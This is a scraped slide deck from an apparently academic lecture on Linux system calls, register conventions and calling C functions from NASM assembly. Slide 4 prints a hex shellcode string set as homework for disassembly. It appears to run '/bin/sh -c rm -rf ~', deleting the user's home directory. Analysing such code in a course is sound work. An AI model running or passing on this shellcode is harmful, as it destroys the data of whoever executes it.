System Calls, C Library Functions - PowerPoint PPT Presentation

1 / 23
About This Presentation
Title:

System Calls, C Library Functions

Description:

What happens if a functions requires more parameters than you have registers? What is a parameter won't fit in a register? An entire struct for example? ... – PowerPoint PPT presentation

Number of Views:43
Avg rating:3.0/5.0
Slides: 24
Provided by: Chris9
Category:

less

Transcript and Presenter's Notes

Title: System Calls, C Library Functions


1
System Calls, C Library Functions
  • LCDR Eagle

2
Homework Review
  • Uppercase
  • Aitel email
  • Shellcode

3
Aitel Email
  • Program received signal SIGTRAP, Trace/breakpoint
    trap.
  • Switching to Thread 1116941248 (LWP 17453)
    0x080edf41 in ?? ()
  • (gdb) x/10xw eip
  • 0x80edf41 0xcccccccc 0xcccccccc 0xcccccccc
    0xcccccccc
  • 0x80edf51 0xcccccccc 0xcccccccc 0xcccccccc
    0xcccccccc
  • 0x80edf61 0xcccccccc 0xcccccccc

4
Shellcode
  • unsigned char linux_shellcode / contributed
    by antiNSA / "\x31\xc0\x31\xdb\x31\xc9\x3
    1\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
    "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\
    x74\x68\x43" "\x54\x52\x4c\x68\x73\x2e\x2e
    \x20\x68\x63\x6f\x6e\x64\x68\x35"
    "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\
    x7e\x68\x72" "\x6d\x20\x2d\xb3\x02\x89\xe1
    \xb2\x29\xb0\x04\xcd\x80\x31\xc0"
    "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\
    x31\xd2\x66" "\xba\x70\x50\x52\xb3\x02\x89
    \xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
    "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\
    xb0\xa2\xcd" "\x80\x4f\x31\xc0\x39\xc7\x75
    \xd1\x31\xc0\x31\xdb\x31\xc9\x31"
    "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\
    x2d\x63\x58" "\x72\x68\x41\x41\x41\x41\x68
    \x41\x41\x41\x41\x68\x41\x41\x41"
    "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\
    x2f\x62\x69" "\x6e\x31\xc0\x88\x44\x24\x07
    \x88\x44\x24\x1a\x88\x44\x24\x23"
    "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\
    x24\x0c\x31" "\xdb\x8d\x5c\x24\x1b\x89\x5c
    \x24\x10\x89\x44\x24\x14\x31\xdb"
    "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\
    xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd
    \x80"

5
Compile It
  • Compile the code with the debugging switch -g
  • gcc o exploit g exploit.c
  • Load it into gdb
  • gdb exploit
  • Disassemble the program at the location of the
    string
  • disassemble shellcode

6
System Calls
  • Operating system services are exposed via the
    "system call" mechanism
  • System calls represent the assembly language
    interface to the operating system
  • The C/C libraries simply provide a C function
    call interface to the Linux system calls

7
Linux System Calls
  • Invoked using an int 0x80
  • This is a software interrupt
  • Transfers control to the kernel
  • Transitions to kernel stack so we can't pass our
    parameters on the stack
  • Parameters placed into various CPU registers

8
Linux System Calls (ii)
  • There are about 190 different system calls
  • But there is only one int 0x80
  • Specify which system call you wish to make by
    placing the syscall number into eax before
    executing int 0x80
  • Not well documented
  • http//www.linuxassembly.org/syscall.html

9
Linux System Calls (iii)
  • A system call is essentially a call to a kernel
    function
  • Like a function call, each system call expects
    zero or more parameters
  • System calls expect their parameters in very
    specific registers

10
Linux System Calls (iv)
  • Syscall parameters (if necessary)
  • ebx first parameter
  • ecx second parameter
  • edx third parameter
  • esi fourth parameter
  • edi fifth parameter

11
Useful System Calls
12
Why Use Syscalls
  • No need for libraries
  • Smallest fastest code
  • Often used in shell code
  • No need to link to libraries
  • Windows does not use syscalls
  • Windows shell code is more difficult to write

13
Parameter Passing
  • Many functions require parameters
  • You may pass parameters around any way you see
    fit
  • For example
  • You could write a function that expects two
    parameters and requires the caller to place them
    in EAX and EBX
  • As long as you know what your function expects,
    you will be able to call it

14
Parameter Passing (ii)
  • A good idea to be consistent across functions
  • Problems
  • What happens if a functions requires more
    parameters than you have registers?
  • What is a parameter won't fit in a register?
  • An entire struct for example?
  • How to deal with recursion?
  • How will other programmers know how to call your
    functions?

15
Calling Conventions (i)
  • Compiler writers have already dealt with all of
    these issues
  • Particularly the many parameters and recursion
    problem
  • By defining and adhering to calling conventions
  • We can interface to a wider variety of code
  • Others can interface to our code

16
Using C/C Libraries
  • Wider range of functions available
  • Less system dependent
  • Linux syscalls clearly only work on Linux systems
  • Must understand C/C calling conventions
  • How to pass parameters
  • Where to expect return
  • How to clean up the stack

17
Calling Conventions (ii)
  • Vary by compiler
  • Visual C
  • cdecl
  • Push parameters right to left
  • Caller cleans up stack
  • stdcall
  • Push parameters right to left
  • Called function cleans up stack
  • fastcall
  • First two parameters (on the left) go in ECX and
    EDX
  • Remaining parameters are pushced right to left
  • thiscall
  • For C non-static member functions, this is
    placed in ECX

18
Calling Conventions (iii)
  • gcc
  • Supports cdecl and stdcall
  • cdecl is the default
  • g
  • Uses thiscall for non-static member functions

19
Other Considerations
  • Where to expect return values?
  • Generally returned in EAX
  • 64 bit values in EDXEAX
  • Preserving registers
  • gcc expects a function to preserve the contents
    of some registers across a function call
  • EBX, EDI, ESI, EBP
  • push msg
  • call printf
  • add esp, 4 eax, ecx, edx may have changed

20
Calling a C Function
  • Knowing calling convention and required
    parameters, you can call C functions from
    assembly
  • section .data
  • format 'X s',0xA,0
  • section .text
  • push eax
  • push format
  • call printf
  • add esp, 8

21
Using C/C Libraries
  • Must link your object file (assembled source
    file) to the libraries you wish to use
  • I find it easiest to let gcc do this for me
  • BUT! gcc wants to add a _start function for
    library initialization prior to calling main
  • So, you better not name your entry point _start
  • Name it main to make gcc happy

22
Example
  • section .data section declaration
  • msg db "Hello, world!",0x0a,0 our
    string
  • section .text section declaration
  • global main Allow gcc to find our function
  • extern printf tell nasm about functions we wish
    to call
  • extern exit
  • main
  • write our string to stdout
  • push msg parameter to printf
  • call printf
  • pop eax clean up the stack
  • and exit
  • xor eax,eax return value of zero
  • push eax parameter to exit

23
Running It
  • Assemble and link the example as follows
  • nasm f elf hello_main.asm
  • gcc o hello_main hello_main.o
Write a Comment
User Comments (0)
About PowerShow.com